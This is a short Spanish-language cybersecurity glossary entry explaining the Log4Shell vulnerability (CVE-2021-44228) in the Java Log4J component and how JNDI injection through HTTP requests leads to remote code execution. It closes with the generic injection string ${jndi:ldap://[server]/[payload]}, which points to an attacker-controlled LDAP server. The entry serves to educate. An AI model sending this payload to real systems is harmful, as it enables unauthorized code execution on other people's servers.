glosario de ciberseguridad

¿Qué es Log4Shell?

Log4Shell es una vulnerabilidad remota que afecta al componente Java Log4J utilizado por miles de aplicaciones para guardar logs de la actividad de la aplicación.

El nombre de Log4Shell se le asignó a la vulnerabilidad identificada por Mitre como CVE-2021-44228 y aprovechaba un fallo de filtrado de los datos que llegan a este componente permitiendo realizar una inyección JNDI. A través de este fallo era posibile inyectar cadenas especialmente manipuladas que permitían la ejecución de código arbitraria.

En la mayoría de los casos, simplemente era necesario añadir este contenido a cualquier petición HTTP para forzar que el componente Log4J estableciese una conexión contra el servidor ldap del atacante y ejecutase código arbitrario.

${jndi:ldap://[server]/[payload]}